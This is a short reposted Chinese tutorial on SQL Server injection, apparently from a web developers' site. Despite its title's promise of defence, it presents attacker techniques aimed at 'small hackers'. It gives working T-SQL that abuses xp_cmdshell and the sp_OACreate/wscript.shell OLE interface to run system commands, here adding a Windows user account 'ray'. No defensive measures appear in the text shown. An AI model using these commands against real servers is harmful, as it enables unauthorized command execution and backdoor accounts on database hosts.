SQL Server注入大全及防御

转帖：web工程师之家
SQL Server是中小型网站广泛使用的数据库，由于功能强大也滋生了很多安全问题，国内又因为SQL注入攻击的很长一段时间流行，导致对SQL Server的入侵技巧也层出不穷，由于SQL Server支持多语句，相信很多小黑在对SQL Server进去SQL注入的时候很少使用猜解表名之类的方法，而直接转向使用SQL Server的存储过程和函数快速的拿权限，下面我就围绕SQL Server的系统存储过程和函数来介绍这些黑客技巧。

　　一、执行系统命令

　　利用存储过程我们可以快速方便的获取一个shell,如执行系统命令，存储扩展调用如下：

　　exec master..xp_cmdshell 'net user ray ray /add'

　　xp_cmdshell是SQL Server自带的系统命令存储过程，默认情况下只有SYSADMIN服务器角色才能执行。

利用OLE对象接口，SQL SERVER提供了一些函数访问OLE对象，分别是sp_OACREATE和sp_OAMethod,可以利用他们调用OLE控件，间接获取一个shell。使用SP_OAcreate调用对象wscript。shell赋给变量@shell，然后使用SP_OAMETHOD调用@shell的属性run执行命令。

　　DECLARE @shell INT

　　EXEC SP_OAcreate 'wscript.shell',@shell out

　　EXEC SP_OAMETHOD @shell,'run',null, 'net user ray ray /add'

更多详细步骤【带图操作】请查看原文